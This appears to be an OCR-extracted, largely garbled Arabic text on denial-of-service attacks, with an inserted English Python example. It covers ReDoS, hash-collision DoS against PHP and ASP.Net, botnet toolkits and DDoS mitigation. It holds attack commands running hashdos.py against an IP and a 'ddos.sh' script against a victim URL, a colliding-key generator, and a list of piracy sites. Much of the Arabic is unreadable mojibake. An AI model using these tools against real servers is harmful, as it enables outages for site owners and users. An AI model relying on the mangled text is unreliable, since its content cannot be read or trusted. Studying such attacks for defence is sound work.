else
{
    MessageBox.Show("Good password.");
}

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" j ^Vim^ l " A (([a-z])+.)+[A-Z]([a-z])+$" J^j-? f ^^ l ^ l^j ^ c> 

."hang" Ji«j3i L^^JJ ^jjoj liA jli jjuJI 

Hash Collisions DoS Attacks 

PHP - ASP.Net Hash Algorithm Collision DoS 4- 

.hash algorithm collision 
. ASP.Net j Python Java 'PHP JS* i«3L5« 
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"Hash functions" ^ e^ 1 ^ ^ Ul * JH "{Hash map) lW ^LJ^" J "(TMi table) lW JjV 
ikjjjJI tij^Vl fjSl! (oaa^lt <xJ JUJI "(key) ^jjUJI" "Identification Value" ^ 

■ C5^-^ (JjjlA (Jj^ (J^juJI ^jJajJ .(^j-a^juol! <jl jic (JtlxJl ^5^) 




Jl$l\ dj^j jUVl c> jiS ^ .^jjliJ! l^ii^j ^jll ^a f VI jj^JI" fjill Udij "keys" ^jliJI ^a "plSjjll" ^1 

"Development framework" <^ i> lU*^ "hash collision" 
.t_fl^JI ( jnWfl l liA JLoj jjj ^jS c_jLai^j ^bSlI <u£*j "generation function" *L&VI 3Jta u?^\ 
<UL^. ^ <il3i t . ujujj Uui <j j£^<JI <^JIsla3I j ^^ic j j-<^ jj ^1 <_£^jj c — J^-M cJ^^ ^£11 6 ^ ^J-^ ( — * l3J- 

jSiU (jjoij J jj £>1a t^lj POST HTTP s-^a J^U. ^ ^jU> ^31 ^ CjjIjU^ 2 J^J-? ^ * J^Ji lW^ 

£§1 jit d^A uiflLuaH Ll£j CjUjjKiII j CjULU! 

• Java, all versions 

• JRuby <= 1.6.5 

• PHP <= 5.3.8, <= 5.4.0RC3 

• Python, all versions 

• Rubinius, all versions 

• Ruby <= 1.8.7-p356 

• Apache Geronimo, all versions 

• Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22 

• Oracle Glassfish <= 3.1.1 

• Jetty, all versions 

• Plone, all versions 

• Rack <= 1.3.5, <= 1.2.4, <= 1.1.2 

• V8 JavaScript Engine, all versions 



4-uIa ls 2li^ 



PHP Hash Function Weakness ❖ 
"Daniel J.Bernstein's X 33 Times with Addition" 1 j* li*j DJBX33A ^^11 *ib php fci 

; JIjII j^3t C5 Ic JjUui Ia^ j£ (Jj^j (jl clA^ C5^^ 

/* Hash function created by Daniel J. Bernstein, "times 33 with addition" */
typedef unsigned long hash_t;   /* typedef added here; PHP 5's Zend hash uses an unsigned long */

hash_t bernstein_hash(const unsigned char *key)
{
    hash_t h = 0;
    while (*key)
        h = 33 * h + *key++;    /* wraps silently on overflow */
    return h;
}

.$_POST c>M J c£b POST HTTP ^ ^> t> ^ M> j^k ^ ^ ? 

8 <jjfL U SjIc Ainlt ai^J POST S-^a C5 juoSVI ^aJl (.> £ji3t ti& J^L* Aiix^Ja ^>^i Aillt t3JWt aifc tju>n 

Jjj l_a jjoj ti$i '"multiple collisions" ^^*1<JI cjU1,^>^V1 cju>n jl IgiLi ^ ^t ^jSII (jiasu ^ ci& ^J* tit jSl j <ciuljU_ix> 

iphp.ini L <*-^l*-<<Jt *>i& ajj ^3 tit CjIcLuj ^olmj ^jt (j^j <^i3t *L<»^Jt u^a 
max_input_time (default -1, unlimited)
max_execution_time (default 30 seconds)

4<JU3t ^t j£Vt <LuoLaj .a^Axla CjUlSa JLujjU ^tg-^t ^ tit CjL^Jt ^ £ jilt tigJ Jlxi JluiJ t bikjlt \ * '< «J V jjSlI" ai* < laaJt * jjoJ 
^3 jj CL^^Jt 4-lJjlt ^t IgJLuijt ^aJJ L ^il\ JA^Jt ^jl 1 * a J^ j^JaJj flXjJalt ti^J <L^ll<Jt "exploit" J^-*^ L>* 

IjSl^l 3Jh ^ CjUt^Saj^aVt 

Ld = {'OVEz', T:FY f , '2VG8 f , ^VH' +chr(23), ^VD'+chrCm+SS) 
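As an added example (not from the page or from the HashCollision-DOS-POC project), the following Python reimplements the DJBX33A hash from the C code above, shows that the page's colliding keys ('Ez', 'FY', 'G8') and every concatenation of them fall into a single bucket, and demonstrates the two defences that closed this class of bug: a parameter-count limit in the spirit of PHP's max_input_vars, and a keyed hash that an attacker cannot precompute. The 1000-parameter limit and the keyed BLAKE2b are the example's own choices.

```python
# Added example, not from the page or the HashCollision-DOS-POC project.
# Reimplements DJBX33A (the hash PHP used for $_POST keys, shown in C above),
# shows why a crafted parameter list degenerates the hash table into one
# bucket, and demonstrates two defences: a parameter-count limit in the spirit
# of PHP's max_input_vars, and a keyed hash that cannot be precomputed.
import os
import hashlib
from collections import defaultdict


def djbx33a(key: bytes) -> int:
    """Daniel J. Bernstein's 'times 33 with addition', wrapped to 32 bits."""
    h = 0
    for b in key:
        h = (33 * h + b) & 0xFFFFFFFF
    return h


# Constructed sample: two-byte keys that already collide under DJBX33A
# (33*ord('E')+ord('z') == 33*ord('F')+ord('Y') == 33*ord('G')+ord('8') == 2399).
# The page's exploit set is built from the same pairs ('Ez', 'FY', 'G8', ...).
COLLIDING_PAIRS = [b"Ez", b"FY", b"G8"]


def colliding_keys(n_pairs: int) -> list:
    """All concatenations of n_pairs colliding pairs.

    For equal-length x and y, h(x || y) == h(x) * 33**len(y) + h(y), so
    every concatenation of pairs sharing one hash also shares one hash.
    3**n_pairs distinct keys result, all landing in the same bucket.
    """
    keys = [b""]
    for _ in range(n_pairs):
        keys = [k + p for k in keys for p in COLLIDING_PAIRS]
    return keys


def bucket_histogram(keys, hash_fn, n_buckets: int = 1 << 16) -> dict:
    """Number of keys per bucket when a table of n_buckets uses hash_fn."""
    buckets = defaultdict(int)
    for k in keys:
        buckets[hash_fn(k) % n_buckets] += 1
    return dict(buckets)


# Defence 1: bound the work before building the table. PHP shipped this as
# max_input_vars (default 1000); the constant here is the example's own value.
MAX_INPUT_VARS = 1000


def accept_request(param_names) -> bool:
    """Reject request bodies carrying more parameters than the table may hold."""
    return len(param_names) <= MAX_INPUT_VARS


# Defence 2: a per-process secret key. Colliding inputs would have to be
# computed against the actual hash function, which is no longer public.
_SECRET = os.urandom(16)


def keyed_hash(key: bytes) -> int:
    """Keyed BLAKE2b, standing in for SipHash-style hash randomization."""
    digest = hashlib.blake2b(key, key=_SECRET, digest_size=8).digest()
    return int.from_bytes(digest, "big")


if __name__ == "__main__":
    keys = colliding_keys(5)                 # 243 keys, all hash to one value
    weak = bucket_histogram(keys, djbx33a)
    strong = bucket_histogram(keys, keyed_hash)
    print("DJBX33A: %d keys in %d bucket(s), largest %d"
          % (len(keys), len(weak), max(weak.values())))
    print("keyed:   %d keys in %d bucket(s), largest %d"
          % (len(keys), len(strong), max(strong.values())))
    print("accepted:", accept_request(keys), accept_request(colliding_keys(7)))
```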

ASP.Net Hash Function Weakness ❖ 
yr* j DHBX33X *ib "farms" ^ "object Request" ^ ASP.Net <^ 

.Meet-In-The-Middle >^ A "Daniel J. Bernstein's X 33 Times with XOR" J J-^t 

U^klaui 100-90 is* lW^W AjjSjaJI <^JlxJt 6^ j b^luJJ <jt (j^Ai i ASP.Net (JJJ^ f j^Jfc jj ^jj (^ilt fi^lgjtll 

jl jSaj ^t ^U^Jt l-l^ 3JU Jjj jl 4Jili CjUIL JL-jU ^l^Jt flS tit t^SUJt 6 iA ^ .^tj POST HTTP 

HTTP c^lj ^ASP.Net g?^ mu 11 ^ u 

application/x-www-form-urlencoded or multipart/form-data 

PHP Hash Table Collision Practice Attack ❖ 

^ cr^^j ■ u^*l£ ci^ c> HashCollision-DOS-POC ^ ^ "Exploit used" *^ ^««W JL&\ 

https://github.com/FireFart/HashCollision-DOS-POC 

2.2 g-^M ls^- J 1 ^ 1 liA -PHP Hash Table Collision U*e Vli« „ jaJi I ^ ^ 

.7 jj^jjj ;Jj^sll ^Lkj .5.3.8 J-i^aVI Cjli PHP s^j 11 f- 2 ^ 

Apache Geronimo: CVE-2011-5034
Oracle Glassfish: CVE-2011-5035
PHP: CVE-2011-4885
Apache Tomcat: CVE-2011-4858

^joij l^jjoj Pythonbrew . J*^^ ^if^^ 2.7 4^ ^ 'Pythonbrew lp^ 

. ( Pythonbrew -^^^ cJ^-^- a \^^*^ ^j) uj^^ ciit jt^-at < alia a 

I^Vl^ C^^Jt jxJt .Ua c^^^ <&UlaJ ^ j£j 

$ python hashdos.py -u http://192.168.16.16/index.php -v -c 500 -t PHP 
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roott'ibt : 



•a python hiihdas.py u http://f5.224. 



'ir>fll#x.php -v -c 53& -t FHFfl 



Google+ HTTP GET Request DDoS * 

Sj.jtall CjLd^Jl £A <Jj 4L_fl^Jl Sjjuitixi -laJJjJ V L_kxjJa3l JalfiJ J^IsUjoj! 1 lj£ aJ 4il t flj£ ^jc <Jtla jjoij L_fl jjuj ^judkll I^A J 

^ jjll li^ ^jl ^j-djJaj (jl 1 jj£ &J V DDoS (j/^*^ L3 ^-ajudj L*-g t^Ajjjll JjUajll (jlajC &JJJ^ CllLLa£ Jc (JaslSI Jc 

.<KAa1I ^L^sh I Jc. jC. jla j>» J'j^ V 4jjSj]1 

CjUlial "^^jui^jjj" GOOgle+ ^JC-Lai^VI CjI^jJoII ^\ \klui\ Ijj^ial t^jjJUajVI 4_jj^alj£]| ^ <C ja^ a t^^jJaxa *--^J ^ 

u^h ?I^<L> j *<-iJ*il tA^ 1 (. p df J .doc uj^ ^ fc^O o*- 1 -^ (> ^311 j HTTP GET 

.ciia jll ^jjoij J diUlLlt cjUaj ^LsU Google+ jf?^ * cr^'j ^L^j^VI 

HTTP JAhjj* 

(J^. j^. ^jI j^. ^j-d S^jujUx CjUIUI ^j-<i Sjjj^ lSLjjj] (J^aaII (j-<^ t^JI CjI £^ jj ^i^j^all (JL^-^VI 4 ^ > <^> ^'qVill (jj^ 

.AjJjA qC* L_Lua^3l ^a^C 6^1^. Ljajl (JJ'^ (3 ^ ^-^>.nj A Jjuj I1a .IgJ ^^.Jjjll JjUajll j 

http://www.lo0.ro/2011/08/29/google-plus-ddos-attack-script -M jll i> <L*^ ^ ^ ^j^* t> f ^ ^ 

Jllall J& a^\^U\ "http://www.ihteam.net " IHTeam Jjja I^IS c^^^j 
$ ./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000

THE BOTNET AS A DDOS TOOL



diaj "botnet" uj^ ^ u.. 1 ^ <s ,5^^aJI ^jUij^JI t . ujujjj] ^ j^gll ^j^j cJ lS^^ ^ > ^j- u^^^ 

^ijoaj ^^jll <ln^Jl lIjLi^jJU is-\a ^''^^j-g jj" ^juAj l^J] La Ullc. j lAijI^ jj jJAx^ll 6j^j>.l *^J^ djlc jA^a- ^Sjj^j 

( jc <j^aLk]| cjIj jjjjJI 4£jjuj CjWI ^^ic SjiajjuJI ^^ic ^jjj^la t"lierders" j' j^jj^^ ( . ^ 1 ^ .f^ 0 j trt ^« o^^W*^ 

,c_jL<i jIslaII 

fj\ ciilj jjjjII c-jU > J JjU U£) CjVI 20^000 5^ ^ i^jlo '2006 ^ c> IjW^I 

Zeusj <TDL-4 'Conficker 'BredoLab j^VI dijj jJ! c_j1£jjuj ^Ua jl£ Liajl t(c ^^1 1 c-uaal 1^1^ q^sS 

qc> ^jjj V La ^i-J ^IaxjjojI ^^ic ^akjai ^1 Jja ^jxi 6jjj£ djjj jj CjI^jjuj j^-Li (j^j Li !jjj£ .CjVVI ^jjj^LJI ^^ic I^jI jj^.L 

^Jc. jJaJ ^jl! CjIj JJjjll f\ lull dbJa JC djJjjjVl A^JjuJ ^^J^ ^^Jld ^^Jc djL!>lcVl LpaxJ l^l^kloaV jJl ^ jV j^ 100 

^jujUJI CjIj^VIj Altix-all <JJ5j3l <3 jai-JI ia^a Ljj£i j ^ ^joiJ Lu» t(^jJl ^fl jVj^ 200 ^ J^^ C> 120'000-80'000 
CjLl^xijjJl ^glc Jali^Jlj COJJ^VI f djlj^l £-J>^J ^alc UJ^ ~* (j-* 6 jL^-^^ ^ (* L3^^\ 

V CjLa^JI AjJa AjL^J ^Jjj jJl ^j-d C fljj^JjJ jlaJl (j-d jjl ^I^JjojI j 6^5J^.V1 A^JjaJl 6 j^J>l J ^a^l J^Jl ^J^T* ^SJ^ L5^\ 

. jjki ^ J! jj 



"Blended Threat Toolkits" itjli^l cjIjjI 

6^xjujj31 ^Uaj c . ujujj c allkj ^jl (j^-ftj ^^jll j 6<j31j3I jj^aUxJI ^ J£ jl (j^asu o^lc "Blended Threat" CjI^j^jII a > ^Ti 

.^cll 4L^3jxJlj t^l^J^llj tJLlxJl Lff^) ^^Vl <L^.j-j 

j&j ^jl^J! cjl^j^il! ^> jii*j jj^jjj ^ <xjU3I cjIjjVi c> :Windows network service program - 
c> ^j^j L£ l (gU nn ^ g*\ jA\ lS^^ c> <Jj>^ Firedaemon . Firedaemonc5^ j^Ljj 

sjIc s jkiJL eJ ij Firedaemon jl jll cjVL^£U "Network Sockets" ^f^l ^ ^UL,V! 

.backdoor shell jVj 'IRC bounce program 'FTP 

m ^ (jjj^-VI ^jjjjjJa^ll •^^j <j1^a31 a£jjuoH ^\ kj > n j ^^£3 ^.1^1 1 ^cLoaj* <ilik-<JI a£jJo3I cj! > ^i^la ^ ^jaxJI ; Scanners 
mscan TCP banner grabbers uj^ 3 u' c> 'synscan simple SYN scanners ^ jj^j 

. ( http://www.nmap.org ) nmap j^i J ^ djL^la 
■W^? SYN J UDP u 1 * JJ^ t> ^ J : Single-threaded DoS programs - 

L>* J - ^ J*^ 6 ^ (JjxjujJ j L_flJjJaJt Jt <J ja*Jt Jj> > >n ( . La>J ^1 g a\\ A (J^asu AjJa <Ul»i (jj^J J) (j^J Syilk4 

.Power bot ^jVt Jc- s jii ^ Jit IRC ^ tkU jt < ^1 jVI Ja^ 

J-LaaJL (u^j^ c!jL<i^A ^jjicLjaj (jjiJ! Ij iL<ill/cjl-ia ^j;^ jt) (jj^^l g <^ ^-^>.>Lj ^FTP iAn FTP server 

.JjjIkJt L_flJjJaxJt Jj dilaLJl 

jxj cjU^ Jt j (jj^ill j C5 li^ jJI) jLJI UiiJt cjULJI j) ;An IRC file service (Warez) bot 

a jiS IRC Cj Jt .Warez bot Warez ^jL ^Jt cj Jt jl cJj^Jt .Warez 

jVI .Direct Client-to-Client (DCC) protocol Jj^Asjj IRC J * j** f '^^j ^al^ l& J& 

.P2P ^ i. it t^a IRC S j^i 

^Auil <aJjuJ Ja (jc) Clj^ijVt ^JjJ Ja (jC 4 - a j 4_iC^)juj ^)JC. <L JaJ IgJU jjJ £<L Jilt L_J jjuilaJt £cxat^)J ^.IxJj; (Warez) jj^J 

^^ua j Ai^jjoj j A j > ^)fisu jjt jit (Jj-aaJ J 

L-jUtj f^liVt Uiajt ^^-istj (Jj Jaia £Lx*t jJt <J1gj V jjl jJtj l_i jjujI^. ^t Jj^aVt J c^-^j wares ^ aK3 lAjj^j Warez 

U3j^ <Ld^)a^<» jjt jltj. jjlj l^-jt J*J Z J^ S L -^^>^ ^f u "\ ^dJJj L^llAaJ aJJ ^^jlt djUUJt (JA tilli JJC. ^Ic-Vtj L_J jjoaL^Jt 

Cxij±i^\ ^ JUt jt^L Ja*^> ^ jjUII <SjLiiJt Jt ^^jj lg-L^j j 
I^^a Cijjjlilt ^t j-<» ^jujt (j-aj ;CjliL<Jt A£jLai>i ^t j-<» (Jaa^jII *L<»^. ^ jSj ^at j>» jt diijjj ^t j>» (j-a L^liAaJ ^t j-<Jt <illj ^^Ic 
kickass.to 
thepiratebay.se 
rarbg.com 

skidrowcrack.com 

rlsbb.com 

arb-gb.com 

Ljajt j j^-lislt ^ aaldlt dil^jjaJt ^A a ^' cJ^^ 6 ^ > *^ J V l^jj J L— Lia> 6jJj£ ^^f^ J-<^ J 

B XHQ t**l>nM ^J^>*-J^ Cjl^JjaJt (JA J^^^ *^J^^^ A ubftaJt dit jluolt (^ia ^jjJ CjI^jjuj 

t^loJ dlia. (jxitj t^ Jjlala fUaJ jAj ^ jt ^t Jt (jjjia (jc; aJJ jjt jit ^t jSjJjoJt CjULJt <!^UJ ^Uaj <jt IRC XDCC Bot 

jt ^L!t Ia jjaijj ^^jlt £i it j-<Jt ^joit j-<i j jjj^I j f^laVt j a jqj > >i ^<Jt CjliUt jjou j ^jJa j cilj£UiUa l^il^U^ j CjlilxJt ^ hVimt ^ Aj^aJt 

^ j U sjIc IRC s^kJt ^Uilt ^ j^t cjU^ ;lijt j£i U£ ;An IRC DDoS bot or DDoS agent - 
cron J inetd Oj^j ( <j > ^^ t ^ Firedaemon c> g-atjJt J£ c} clA^ .3 kVfo ^\ t Cjt^^ilt 



^ jliixiVt \it > cjjUt ^^xj J^Jij U l^jli ; c-Wt J^oij J*J ^> kits ^t^kiujt iia :Local exploit programs 
jj^l^dl] ^joij tiAj .password sniffing (Jj^^ c?^^ c^^^t ^^klaixJt c_jLai^ ^ l ^j^" ^2 JLa. ^k ^Ikilt 

.^jlLxJt ( bjJaJt ^^Ic UUj ^t jilt Ail£ ClliJJJ tSUi ^su ^jSaJ <Jaii3t ^JC j t^Llilt *6jt^VU 

c^^j ^ c> J 5 ^^ ^Uiu£t Jt U ^-aailt ^t jj Jt lik jj^Jt ; Remote exploit programs 

,^kt £2* j-o 4 ^ a\ L-jl^M] (j^Ual ^ Ita << t aj^aII ^ t,^**u«t jt CtiL <j^aL^Jt 4^ unit Jt ^ ^1 ^ a\\ (jUaj ^Jjuj jj] 1 a *\ iklLaat 

<jt diAj JJ^ ^t ^jjj jUa.Vl c> J ^ 6i 4? o**^ ^ ^-^^ Jj^^ ^ :System log cleaners 

jt (J'^nV(J^jj J SyslOg 6 <Jtl<Jt cJ^f*^ J^) ^ *^j'^t JauaJt dAiLJ c ^ilajj CjUIaC tilLiA .t LijJn^t ^ jL^ajt Jc 

CjULJtj Unix wtmp J Windows Event Logs <J15JI lW^ J&) binary J^Ji CjULJ jt t (Apache log files 

.(lastlog 

J ^UaJt Jt J^ijlt sjUIojV backdoors j^j^J :Trojan horse operating system program replacements 

QjAjLi Ullc- (jjrt^l Jt tdit Ja^Jt/djliLJt j tdiVlj^jt A£jjoi j t^jj^^l $ a\\j 4_x-alaJl CjUIxx]) J ja* j J ja^ ?? L_J^aj" JJaJ cJ*^ 

^JjixjaLilt aUaJ J 4_ia.jlaJt ^tjVt (J^aau Jt^fLojlj 

.cJ j^-^ Jj? ' ^ jjualt cjLJSj cAA uiaJt ^Ldjoat ^3jju^ g <iH ^.^>.>ij sniffer ( ; ^ j2 ; Sniffers 
"Implications" Jftl 



^jjal j cJ^^ ^ <pj^ dbdj CjI j^VI o^asu .AimaJl £cx*!^)i3! ^ ^l^cl ci i» ^ Packets tormS ccurity . org ^jial £^ 
,3J j^oij l^%fkj ^i^oj V script kiddies ^jjal j j^c- j^VI (jiaxJtj o^^J ^joij < \&*\ \ 4-1^ j ^l^kioaVI 
(Detection and Mitigation of High-Rate DoS Attacks) o-jJ <> uLiLUtj O^t 10.7 



aAA (JlxJ Jala all J^-^l <J&LaJj CliLJalall £yz AiAaJl <JI j ^Iuj S^C Ala j^. DDoSj DoS ^ ^ <jl cs - ^ 

aijaJI fnU DDoS ^-a^a J o^aij jjI cljIc^U^ jj jll "hacktivism" J^-^ .CjIau^I 

oliijl Jc <J jj^^J! J fr<< ^ (jjojj lIiIaja^j <j) (*ft^ cs-^- .^-^j^t Cy* ajAslU (j^l c^J^ ls* DDoS Jft j^j^l 

J CjUaJb AJa ft^LjaJt CjI j-> nl jIujVI jVI J^ ^J»J V d)l aW)a\\ ^ AjAjJI l"CSOs" cjH^ ^oSa^ll Cj) <Jala 

a-uIUlU .(Jjjj^ 4_^al^<J a l^J <jaj|jJI I gjLajuj CjUJai<JI Jaia Z3 'Neustar ^ ^ ji W^^>^ ^-^^ 

CjI £lx»J ( jj jl jll j SWitcheS ^5-^ J^) ^jft^l IPSS J *SO^ L)' J"^^ CI ^\ aola ^jl J-dUi CjLJal<Jl ^ ^ <aIa*Ji 

.tiLJ oj^tn &A& .'LdAkjl t ■ 

DDoS fck * "firewall" ^ 4- 

DDoSj DoS i> ^ (>VI Oft UdJL) 2 Radware's ERT £*t5 *2012 ^ ^ 

l-l^ cjL^j* J5U> " JjUI" ^UU jll ^jJI s j^J o-a^i? ERT .201 1 ^ c^j^ lW*j ^ill j 

jAjj <j| lLli^ _4jjoLijj3! ^1 jxl\ Cilia IPS ♦ J ^A^LolaH ClaLauoaj^l] AjI a^JI jIa^. <J1ijI£ CjVI^JI j-Q X32 **— J ^JJ '^AaJl 

^ iS^ill cjVU^jI M '"stateful devices" ^j^^ "firewall" uU^' 

jjaall JL-a2! J jAiJI Iaa ^ J£ ci^j '"connection table" ^-jVI^VI J ^ Cj^L^aJI oi^ J£ cl^j^ ^ lA^^ 
(j jixxj* <jIa^JI jl^a. 0^ "connection table" ^-jVl^aj*Vl J ja*. .I^j J ^as^ 4^ jj^ djVt^l l^iSj <j| ^ 

0^-3 'C-HJ^ ^ cJ^-^- tt^Ui iaLudil (.5^3 liA J ^ lajullll CIjVIj^jVI L_flWl CjIjjoiC. a ^ 'Qj djLauuj^Jl 

is* "connection table" cjVU^jVI JjAa. iiiiJ t^iirk y± Jil "connection table" ajVU^jI JjAa. J aja^ 

^ tgjii ^ jj^alll AixjaJ 4_jUaJI jlAaj (j-aUJI "connection table" ^-jVI^jVI J ja*. J jj^a j ^ .o^jll ^ * * jfi 

"Firewall" ajI^JI jiAa. ^ j Ji^li Jl jj V 

[Figure: Radware Security Survey: Which services or network elements are (or have been) the bottleneck of DoS? Categories shown: Internet pipe, Firewall, IPS/IDS, Load Balancer (ADC), the server under attack, SQL server]



https://www.facebook.com/tibea2004 
"Challenges In DDoS Attack Mitigation" lhj^ <> < ijiViti cjLj^j 



a g II CjIa jJjUjjuj (j-a ^J^xJl <J .L-LiiaJillj < flJo£ll <J 4 )* <jj£j U Lllc. DDoS Jx^J Jll c-jUjaaVI c> ^jAxJI <^5Ua 

4_inJl jl CijjljVI jjjJa J t . Ujujj (jl <jLai (j-a V- JJJ^ ^li ^ J Jc 'VnjV' A^$y^ <J£ 6<Lu^a3I 

(j^ J l^ilc L_fljlxl<Jl (JjS (jx» I^I^JjojI s-IjoiJ (jl (j^J S-^J^ a ^ o , ^ t . ilia <JiLa ^JaJjudJ <CjjjuuJl CjLAl-<JI / aialall 4£jjuoU Ajj^jII 

J£ tcilli Jl AiUbVU .3JI J£l J CjUim lJVI jl lU^II c> ^ J l£ ^ J J* ^ jUVI 

IP f ^ 1 A alia a ill) Ala dlli L_flWI j-a ^-Ij (J^ cJ*^ Jj^-^J IP ^ (J^J^ f* J J JJJ^ 

,^.1 jll ^ j^-ll jAa^q j AjAaj l_ixj^3I j* uj-^ u^^j ^ 4 Header J*-* j jjj^ 
tilli j ."rate limit rule" l!^*^1I ^ j-^ s^clS aIa^j ml j& DDoS ^ <■ ajiaal ^^uin (j-^l^ cJ^-^ 3Jl*£ lgi£J j 3 Injun 

Jl (Jj^aj J^l ^1-* J] (J 1 ga^Vl ^ laJLu^Q (Jjl^ lij .^-C j^jjuIaII JJ^>a1I ^^)^- (_>^J 4_Lu^xJl ^LlujVI 6,1^.1 j (j^lj 6 (jJ^>^l ^^>^ 

jjib LI jj l^J jl <1 ^ ^c. jll JL^sjVI Lpaaj 6 " rate limit rule " J^-^ll ^ s^clS JjS ^ <j ^ j^ ^li ^^-^Vl ^aJI 
1^ s^iLo jjc. (Jj^j Lft o^lc l^ili lil t^jjjcjjuj jjiillj (Jjjc jjuall (Jj^^jjoiaII ^jjj V "rate limit rule" cJ^*-^ ^^15 
c^j "links" ^-j^a j 4-n * . u ill Cjli dij jjjVI ^1 lP 3 *^ La^- "Slashdot effect" 3-6^ ^ j^^- 'u^ ^ c 

. jLufll ^ "flash crowd" j' ^> yi ;^>i_^! 

gj^ "out-of-state packets" c> ^ J^j^ c^j u^j^ c^-W^ U^^'^ ' U yr^j ^f^^ j 1 ^^ 

CJJJjjll ^ jlL ^jaJl Jl^j] (i^jia .TCP J J^JJ^ iS'^ J*^\ L?^UI C5 LiLull 4-l£jA! ^ jU. IgJLujj] ^JJ y-jJl TCP 

^ tiinsJI JL^jV! 11a CjU jkJI ^ Jala^lb lJ^JI ^^1! ^(SYN-ACK ^J>^ ACK ^J>^ 

Jjt^a. ^ CIjVIj^jVI 1^ (jj^aJ £A J-dlxjll 1 g j£ aJ V - a ^jli tlLLoj ^jJa j& ,<J (j^aLaJ! JU^jVI <Jj"^aJ! 

4^^^, l " \ \\ ^ |ij lj laal Sjj laJ a daLij^J a laJLujJ ^jjjj^II 6^Lja>» ^)5^l 4_^aj^aiw<i (J jla. ^jc ^paJ^aull .(Jl^ (JJ^ d iVlj^a^VI 

J^tll jaJl djlia^J blllujl JjJ-<Jl c LiaaH diUll l!^*^ J t^JlaJl ^ 

(J-al*jU 4-j^aLk c LiaJ CjU^jj! jIujI ( ; lUaJJ jll j t"l()W and SlOW" i— A^ds l^ajl (jSl j A-L<LaLaJl CjLa^JI Ja^S I j^AaJLuoJ a! ^1^1^11 
(JlL<» CjIj^I J li^aJ (jlj 4<C j^jjuLg j^JJ (JAslaj a! jj^ajj <C j^)juL<JI Jj^-all ^^>^- ^ J^ iS J^' s " s tdjLo^Jl oi^ (JlLd 

L-LiiaJill CjU^jjI jloal ^^1 1^1.^*1 >>iU CjI ^^(gti ^-<uuaJ Uui 6^. JaJ JAslaj ^j^l j <C jjjoui ^3^" L - u ^ R.U.D.Y.J SlOWlorfS 

diljja J^lk <£jJoJ! Jc 4£jJall ^£ jLJI JjLaJ 5-lj^l a ja^-ll I^A Jla ^jc t aJjlll 4i£xuJl Jfuall ^1 .I^AjujS ^aJJ ^3 jll Aj>lJ^jll 

Jc jl£ lil i JUaII J^ ."low and slow" <J^ f j^^^ U-*-*^ ^ cr^^ ^^^^ 6 ^ <ijtL» j ^^UJI Jjt_uu1I 

( . lllaJJj CjIcLuj (JJiASk ^^jJaki a laJLud^ll ^jl^ lili ^' Q Q- all ^a^V -la^J J^-^ HTTP '"^ ' "V J^^* J (3^^^ C^ 1 ^ (J^f^ 

-C 5j^l ^ilol CjUI j^I Jl 4^.U*J f 4->/" UJ^ ^ AiL^ill (jjaij ^UjV HTTP ^ 1000 

AjuLuj <Lja J^J '(SSL) 4l*V! (jJdjlLJl <Lia J L_kxjJall Jallj ^1 laJL ul Cj^LojI J^lj ^JJ lal^ll ^^i.VI J^-H (J^A 3 (J^H 
a I IsJLujI (J^ylk (j* Lujoj Vj tdjUUill (j>» Sjj£1a1I jjjjujjll (ilflj jjjjujjll jU^-j (J^^A 3 (JC- .HTTPS (J J^J^ J " laJLudJ 4-^jll j^^il 

\c jjj^ll cjUUall ^nlj Jc^ IjjlS JjIj V J^ cJ^JI ^^UJI jjl UUj Jl^j jl ^I^aII j^ jliill s^lcj" J SSL 

L-likJ jUlUj ;*6^)ijaui ^LaJ! Jl Jj^ll ^^>^- (J^ (> — ^ L-LiiaJillj t ftjuj^ll J ^jlill SSL (JJJ^I Jc- ^.laJl ( ■ la^a djl^aA 

diSj J I^juq (J-dlxjllj jl 4x.jjjL<i (jj^J (jl Jj^lj (jl cJ^~ ^jl J-^H ^I^ILujVI a ijj£ 4jUr.j Ulaj jj£j La Ullc. jllj- (ilill ^jj (jl 



jjj-aII J 3 j±ul]| uLiu£ CjUjSj Jp djlaj 

J^l^ (jxi (jj^J (jl J»-^ ci^^ll ^ J>^l Jc- t fljuo^ll CjUjSj l^ilc j^JJ jll ^-1>->UJ^)1I 4 laiill (jl Jl JjIjoiJ CjULjajiill L_ iLd^A jAx-d <Jt_nia 
^CjULjajiill CjUiakA cJ 1 ^*-^ ^^jl cJ^*^ (jl cJ^I^ a\\ ^ja Jill Jj^ll ^^)^ J^ liA 4^1 ,A£jjoi3I JJ^ ^^>^- J jjolIII L_flLau£l 

IjU^I (> CjUjSjAI J^ <*j\U1 CjU^II ^ < L^ill "signature detection techniques" ^£ ^ J 

Jill (JjjLojVI iaiJ Jj^au t a I laJLual J^lk (j-d <£jjuaJ! JJ^ ^^>^- ^1*J ij^juoll (jC t fljuj^ll diLl^J tl^ilc L_fl^)*j3l dlAljuJ JxilU jll 

c La£3l djUjaj .(JjjLujVI JaaJ Jj^>xj3I < LLilt (jc Ij^ c^j^jj jllj jjj>JI ^j^- J ^iUill CjVI^JI c fljuj^j Aj^IxJI a£jJo!I <Jc. j^j 
."Zero day attacks" ^jj*^* cjUl^JI t ai *^<i jc Sj^ll ij^JJI c Lai£ (j^ J Aij^All CjIas^JI ^Ja <ll*i jiill (jc 
jl t("6^Jr ! j^. ialLajj j& j jiaU^ ^jj) UUj JatLJ <UjLi ^ "Mitigation approaches" c fo-^ l 

<Ja*-g ^lijjl ^-g-^-i A-iSLjal Jjl (jsyusy^k* j\ ^(SjjJaLaJl <jl ^LmVi dlUi jl Jc ^jlmti IAjjjIj £*) JJ^Jl (jUlkl 
tAllll AjjouIU .CjjS jSJl J 4jbJt ^ 4_JjjjjJa3lj AjjujIujVI CjUlklallj 6 JjVl jA L_flj£^i JluiJ li^J ji&Vl ^t^l <jli J^A <>a . JJJ"A\ 
^^c. c fljiaj Jc ,a£jjoJI C5 ic SiLuJl JJ^>^ JJ&-^ JJJ - ^ ^^P" -^-^1 ^ C—U^ (j! t3*/ 1 J 

4_u£i3l a^A Jj^j tdua jjll Ul CjU^kJl ^j^j Jiasu V ciUij t^jlxu* ^ J] <jil£3l CjUiLaJlj <jil£3l CjUjL^jVI 

^jjjJ 4il 6 4 Ui-vN ^; .(jj^kl LaUi tJllxJl (J-IJjuj Jc .^j-nlla^l (JJ^A *^J^ CjU^j c*1Ua j^^^ IIa J^Ij (j-a ^^11 (j^-a-a 

